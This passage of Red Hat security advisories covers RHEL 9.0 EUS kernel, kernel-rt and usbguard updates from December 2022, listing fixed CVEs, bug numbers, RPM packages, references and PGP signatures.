iwl_mvm_mac_wake_tx_queue+0x71 (BZ#2123315)

* [Dell EMC 9.0 BUG] Any process performing I/O doesn't fail on degraded  
LVM RAID and IO process hangs (BZ#2126215)

* [HPEMC RHEL 9.0 REGRESSION] net, e810, ice: not enough device MSI-X  
vectors (BZ#2126491)

* RHEL9.0 - zfcp: fix missing auto port scan and thus missing target ports  
(BZ#2127874)

* Enable check-kabi (BZ#2132372)

* Add symbols to stablelist (BZ#2132373)

* Update RHEL9.1 kabi tooling (BZ#2132380)

* kABI: Prepare the MM subsystem for kABI lockdown (BZ#2133464)

* [Dell Storage 9.1 BUG] NVME command hang during storage array node reboot  
(BZ#2133553)

* WARNING: CPU: 116 PID: 3440 at arch/x86/mm/extable.c:105  
ex_handler_fprestore+0x3f/0x50 (BZ#2134589)

* crypto/testmgr.c should not list dh, ecdh-nist-p256, ecdh-nist-p384 as  
.fips_allowed = 1 (BZ#2136523)

* FIPS self-tests for RSA pkcs7 signature verification (BZ#2136552)

* [ovs-tc] Bad length in dpctl/dump-flows (BZ#2137354)

* [RHEL9] s_pf0vf2: hw csum failure for mlx5 (BZ#2137355)

* kernel memory leak while freeing nested actions (BZ#2137356)

* ovs: backports from upstream (BZ#2137358)

* kernel should conform to FIPS-140-3 requirements (both parts)  
(BZ#2139095)

* [DELL EMC 9.0-RT BUG] System is not booting into RT Kernel with perc12.  
(BZ#2139214)

* Fix panic in nbd/004 test (BZ#2139535)

* Nested KVM is not working on RHEL 8.6 with hardware error 0x7  
(BZ#2140141)

* [RHEL9] Practically limit "Dummy wait" workaround to old Intel systems  
(BZ#2142169)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2069793 - CVE-2022-1158 kernel: KVM: cmpxchg_gpte can write to pfns outside the userspace region  
2084479 - CVE-2022-2639 kernel: openvswitch: integer underflow leads to out-of-bounds write in reserve_sfa_size()  
2090226 - CVE-2022-23816 CVE-2022-29900 hw: cpu: AMD: RetBleed Arbitrary Speculative Code Execution with Return Instructions  
2090237 - CVE-2022-21123 hw: cpu: incomplete clean-up of multi-core shared buffers (aka SBDR)  
2090240 - CVE-2022-21125 hw: cpu: incomplete clean-up of microarchitectural fill buffers (aka SBDS)  
2090241 - CVE-2022-21166 hw: cpu: incomplete clean-up in specific special register write operations (aka DRPW)  
2103148 - CVE-2022-29901 hw: cpu: Intel: RetBleed Arbitrary Speculative Code Execution with Return Instructions  
2103153 - CVE-2022-23825 hw: cpu: AMD: Branch Type Confusion (non-retbleed)  
2103681 - CVE-2022-2959 kernel: watch queue race condition can lead to privilege escalation  
2115065 - CVE-2022-26373 hw: cpu: Intel: Post-barrier Return Stack Buffer Predictions  
2141752 - CVE-2022-43945 kernel: nfsd buffer overflow by RPC message over TCP with garbage data

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

aarch64:  
bpftool-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debug-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debug-devel-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debug-devel-matched-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debuginfo-common-aarch64-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-devel-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-devel-matched-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-headers-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-tools-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
perf-5.14.0-70.36.1.el9_0.aarch64.rpm  
perf-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
python3-perf-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm

noarch:  
kernel-doc-5.14.0-70.36.1.el9_0.noarch.rpm

ppc64le:  
bpftool-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debug-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debug-devel-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debug-devel-matched-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-devel-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-devel-matched-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-headers-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-tools-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
perf-5.14.0-70.36.1.el9_0.ppc64le.rpm  
perf-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
python3-perf-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm

s390x:  
bpftool-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debug-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debug-devel-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debug-devel-matched-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debuginfo-common-s390x-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-devel-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-devel-matched-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-headers-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-tools-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-zfcpdump-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-zfcpdump-devel-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-zfcpdump-devel-matched-5.14.0-70.36.1.el9_0.s390x.rpm  
perf-5.14.0-70.36.1.el9_0.s390x.rpm  
perf-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
python3-perf-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm

x86_64:  
bpftool-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debug-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debug-devel-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debug-devel-matched-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debuginfo-common-x86_64-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-devel-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-devel-matched-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-headers-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-tools-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
perf-5.14.0-70.36.1.el9_0.x86_64.rpm  
perf-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
python3-perf-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm

Red Hat Enterprise Linux BaseOS EUS (v.9.0):

Source:  
kernel-5.14.0-70.36.1.el9_0.src.rpm

aarch64:  
bpftool-5.14.0-70.36.1.el9_0.aarch64.rpm  
bpftool-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-core-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debug-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debug-core-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debug-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debug-modules-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debug-modules-extra-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debuginfo-common-aarch64-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-modules-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-modules-extra-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-tools-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-tools-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-tools-libs-5.14.0-70.36.1.el9_0.aarch64.rpm  
perf-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
python3-perf-5.14.0-70.36.1.el9_0.aarch64.rpm  
python3-perf-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm

noarch:  
kernel-abi-stablelists-5.14.0-70.36.1.el9_0.noarch.rpm

ppc64le:  
bpftool-5.14.0-70.36.1.el9_0.ppc64le.rpm  
bpftool-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-core-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debug-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debug-core-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debug-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debug-modules-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debug-modules-extra-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-modules-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-modules-extra-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-tools-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-tools-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-tools-libs-5.14.0-70.36.1.el9_0.ppc64le.rpm  
perf-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
python3-perf-5.14.0-70.36.1.el9_0.ppc64le.rpm  
python3-perf-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm

s390x:  
bpftool-5.14.0-70.36.1.el9_0.s390x.rpm  
bpftool-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-core-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debug-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debug-core-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debug-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debug-modules-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debug-modules-extra-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debuginfo-common-s390x-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-modules-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-modules-extra-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-tools-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-tools-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-zfcpdump-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-zfcpdump-core-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-zfcpdump-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-zfcpdump-modules-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-zfcpdump-modules-extra-5.14.0-70.36.1.el9_0.s390x.rpm  
perf-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
python3-perf-5.14.0-70.36.1.el9_0.s390x.rpm  
python3-perf-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm

x86_64:  
bpftool-5.14.0-70.36.1.el9_0.x86_64.rpm  
bpftool-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-core-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debug-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debug-core-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debug-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debug-modules-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debug-modules-extra-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debuginfo-common-x86_64-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-modules-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-modules-extra-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-tools-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-tools-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-tools-libs-5.14.0-70.36.1.el9_0.x86_64.rpm  
perf-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
python3-perf-5.14.0-70.36.1.el9_0.x86_64.rpm  
python3-perf-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm

Red Hat CodeReady Linux Builder EUS (v.9.0):

aarch64:  
bpftool-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-cross-headers-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debug-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debuginfo-common-aarch64-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-tools-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-tools-libs-devel-5.14.0-70.36.1.el9_0.aarch64.rpm  
perf-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
python3-perf-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm

ppc64le:  
bpftool-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-cross-headers-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debug-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-tools-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-tools-libs-devel-5.14.0-70.36.1.el9_0.ppc64le.rpm  
perf-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
python3-perf-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm

s390x:  
bpftool-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-cross-headers-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debug-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debuginfo-common-s390x-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-tools-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-zfcpdump-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
perf-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
python3-perf-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm

x86_64:  
bpftool-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-cross-headers-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debug-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debuginfo-common-x86_64-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-tools-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-tools-libs-devel-5.14.0-70.36.1.el9_0.x86_64.rpm  
perf-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
python3-perf-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1158  
https://access.redhat.com/security/cve/CVE-2022-2639  
https://access.redhat.com/security/cve/CVE-2022-2959  
https://access.redhat.com/security/cve/CVE-2022-21123  
https://access.redhat.com/security/cve/CVE-2022-21125  
https://access.redhat.com/security/cve/CVE-2022-21166  
https://access.redhat.com/security/cve/CVE-2022-23816  
https://access.redhat.com/security/cve/CVE-2022-23825  
https://access.redhat.com/security/cve/CVE-2022-26373  
https://access.redhat.com/security/cve/CVE-2022-29900  
https://access.redhat.com/security/cve/CVE-2022-29901  
https://access.redhat.com/security/cve/CVE-2022-43945  
https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/solutions/6971358

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5j9+dzjgjWX9erEAQjSXxAAhEihoM+2Y0PUAdnoM55yPu0hNbruEYor  
/a+0kD2hhj9jeHm0ixX7bEa6g4dFRRVHxCGjPkvCuxmwB2+z27XWyDssyGP6NHG9  
z4hKa2yFVG0QCNDxum2FjF8GVhHELESuuGm+9ouJ6y18YUSkbmVts08PBa2pA79v  
0HLCMg7lHqdVIpgJ1eUIWBxU9t9yd09NZazyQEx4nKuAw44tJvljw96xpxp1Nnhe  
pIMsceSrmT3HYuhkhqaScT5gy0MHKSbLC8iJeX54UFJeY/tD2XX7DwdAB1jdxEv3  
8+vkmkgNFmCcxQlryjANle7URr/Z2i5An0ejRTN9tL1fWxB6UJbsU55x2zjQQBRs  
u90Yingm1b5vwEQp7+J0R1tSW34MnXwBcP8lU0ZTeZ6c7gaRkHArJpEfDXndJUDy  
OjGf5OI93n1ixyLUgCAF6/jwUNRy+yGWiqvvaHD4pJb79O/IESotOFxNWZ3vYPfL  
QElAENKuEF0SiS3gTe/2RZ5I+wIpnrdGmTkS4as4kyb1zvSERJY2eTC6UDQgMi15  
8u8yxMqpdtYO8+4knYwSDxYaplH+cC6Ktxso8cpskOdOstSChWC6plblOvGfRFTA  
VeDwyTZ3bG0v7WKZJ0Xl3L3ZR9yDz3XSUBADx2PN8VdyoetCFX7xgDPK7fL2rhvV  
jBvWwm6iwuc=  
=qCP1  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8973-01

Red Hat Security Advisory 2022-8974-01 - The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Issues addressed include buffer overflow, code execution, out of bounds write, and privilege escalation vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel-rt security and bug fix update  
Advisory ID:       RHSA-2022:8974-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8974  
Issue date:        2022-12-13  
CVE Names:         CVE-2022-1158 CVE-2022-2639 CVE-2022-2959   
                   CVE-2022-21123 CVE-2022-21125 CVE-2022-21166   
                   CVE-2022-23816 CVE-2022-23825 CVE-2022-26373   
                   CVE-2022-29900 CVE-2022-29901 CVE-2022-43945   
=====================================================================

1. Summary:

An update for kernel-rt is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Real Time EUS (v.9.0) - x86_64  
Red Hat Enterprise Linux Real Time for NFV EUS (v.9.0) - x86_64

3. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables  
fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: KVM: cmpxchg_gpte can write to pfns outside the userspace region  
(CVE-2022-1158)

* kernel: openvswitch: integer underflow leads to out-of-bounds write in  
reserve_sfa_size() (CVE-2022-2639)

* kernel: watch queue race condition can lead to privilege escalation  
(CVE-2022-2959)

* kernel: nfsd buffer overflow by RPC message over TCP with garbage data  
(CVE-2022-43945)

* hw: cpu: incomplete clean-up of multi-core shared buffers (aka SBDR)  
(CVE-2022-21123)

* hw: cpu: incomplete clean-up of microarchitectural fill buffers (aka  
SBDS) (CVE-2022-21125)

* hw: cpu: incomplete clean-up in specific special register write  
operations (aka DRPW) (CVE-2022-21166)

* hw: cpu: AMD: RetBleed Arbitrary Speculative Code Execution with Return  
Instructions (CVE-2022-23816, CVE-2022-29900)

* hw: cpu: AMD: Branch Type Confusion (non-retbleed) (CVE-2022-23825)

* hw: cpu: Intel: Post-barrier Return Stack Buffer Predictions  
(CVE-2022-26373)

* hw: cpu: Intel: RetBleed Arbitrary Speculative Code Execution with Return  
Instructions (CVE-2022-29901)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* kernel-rt: update RT source tree to the latest RHEL-9.0.z5 Batch  
(BZ#2137580)

* [DELL EMC 9.0-RT BUG] System is not booting into RT Kernel with perc12  
[kernel-rt] (BZ#2139864)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2069793 - CVE-2022-1158 kernel: KVM: cmpxchg_gpte can write to pfns outside the userspace region  
2084479 - CVE-2022-2639 kernel: openvswitch: integer underflow leads to out-of-bounds write in reserve_sfa_size()  
2090226 - CVE-2022-23816 CVE-2022-29900 hw: cpu: AMD: RetBleed Arbitrary Speculative Code Execution with Return Instructions  
2090237 - CVE-2022-21123 hw: cpu: incomplete clean-up of multi-core shared buffers (aka SBDR)  
2090240 - CVE-2022-21125 hw: cpu: incomplete clean-up of microarchitectural fill buffers (aka SBDS)  
2090241 - CVE-2022-21166 hw: cpu: incomplete clean-up in specific special register write operations (aka DRPW)  
2103148 - CVE-2022-29901 hw: cpu: Intel: RetBleed Arbitrary Speculative Code Execution with Return Instructions  
2103153 - CVE-2022-23825 hw: cpu: AMD: Branch Type Confusion (non-retbleed)  
2103681 - CVE-2022-2959 kernel: watch queue race condition can lead to privilege escalation  
2115065 - CVE-2022-26373 hw: cpu: Intel: Post-barrier Return Stack Buffer Predictions  
2141752 - CVE-2022-43945 kernel: nfsd buffer overflow by RPC message over TCP with garbage data

6. Package List:

Red Hat Enterprise Linux Real Time for NFV EUS (v.9.0):

Source:  
kernel-rt-5.14.0-70.36.1.rt21.108.el9_0.src.rpm

x86_64:  
kernel-rt-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-core-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debug-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debug-core-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debug-debuginfo-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debug-devel-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debug-kvm-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debug-modules-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debug-modules-extra-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debuginfo-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-devel-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-kvm-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-modules-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-modules-extra-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm

Red Hat Enterprise Linux Real Time EUS (v.9.0):

Source:  
kernel-rt-5.14.0-70.36.1.rt21.108.el9_0.src.rpm

x86_64:  
kernel-rt-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-core-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debug-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debug-core-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debug-debuginfo-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debug-devel-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debug-modules-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debug-modules-extra-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debuginfo-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-devel-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-modules-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-modules-extra-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1158  
https://access.redhat.com/security/cve/CVE-2022-2639  
https://access.redhat.com/security/cve/CVE-2022-2959  
https://access.redhat.com/security/cve/CVE-2022-21123  
https://access.redhat.com/security/cve/CVE-2022-21125  
https://access.redhat.com/security/cve/CVE-2022-21166  
https://access.redhat.com/security/cve/CVE-2022-23816  
https://access.redhat.com/security/cve/CVE-2022-23825  
https://access.redhat.com/security/cve/CVE-2022-26373  
https://access.redhat.com/security/cve/CVE-2022-29900  
https://access.redhat.com/security/cve/CVE-2022-29901  
https://access.redhat.com/security/cve/CVE-2022-43945  
https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/solutions/6971358

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5j98NzjgjWX9erEAQgJMg//YsMeDDnxaD5147QWtdvcUXAEPUwgTclc  
q1S5Csnsli/lgNjEJxENBGin22RzGKBue9dl7BbKUQMTTYyrzZcnY75g7J6/tOzw  
UmhtxESE7Zge4ghgHtuTRpG5QEWvh73SYfFUyeIwby0QM6ONJX2nXViA88JXrnke  
Eggo5lSUOBjhvJZgWfx8VSCBWjshMdy7Lin0B+gGQuaQCumacHxNPNaHM/11j7bg  
2PXxqjleqhD1eyGfj9W1REd4HiE+6WYKT4OS3mPDESbv7lbEVMOxGgi0dBbt6JI3  
m8/bqoMh48fEAlf7H0UWw9/R/mY7zY2UMsAj10RHXMSeNr/QkNxzxNIJ7SYFU13C  
EKMEnUw/vS4JWET/JUgrsxu08sP9oD3IwQtPTJWTrq/mhBUdHlYjxkZADtk03XHk  
Y7GXVNeJe66XnJACQnlHuWtqTE6WidbM30Rc3wI0SAfx0hcYAPgoGfQWX7EFTp8s  
UlMyN7wd8qGbceNw6uk/k3rPcWW3EGeNw6HsUhN9eIVdRBBnlAk/i/O5ofShSYRr  
jctm+3T/7x04oFGJFo56wNfkyTy8W6Lj4Oxr7us7cJFJBW5l+T52re3XtIA0Uaib  
An7Ka+5uBvmooYnCQJyR4qnpNXB+Csdav+vOfrT5EKVvh33YlyB0O792J9EGqgSB  
CW+f3k/Ec3g=  
=3xRb  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8974-01

Red Hat Security Advisory 2022-8971-01 - The USBGuard software framework provides system protection against intrusive USB devices by implementing basic whitelisting and blacklisting capabilities based on device attributes. To enforce a user-defined policy, USBGuard uses the Linux kernel USB device authorization feature.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: usbguard security update  
Advisory ID:       RHSA-2022:8971-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8971  
Issue date:        2022-12-13  
CVE Names:         CVE-2019-25058   
=====================================================================

1. Summary:

An update for usbguard is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The USBGuard software framework provides system protection against  
intrusive USB devices by implementing basic whitelisting and blacklisting  
capabilities based on device attributes. To enforce a user-defined policy,  
USBGuard uses the Linux kernel USB device authorization feature.

Security Fix(es):

* usbguard: Fix unauthorized access via D-Bus (CVE-2019-25058)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
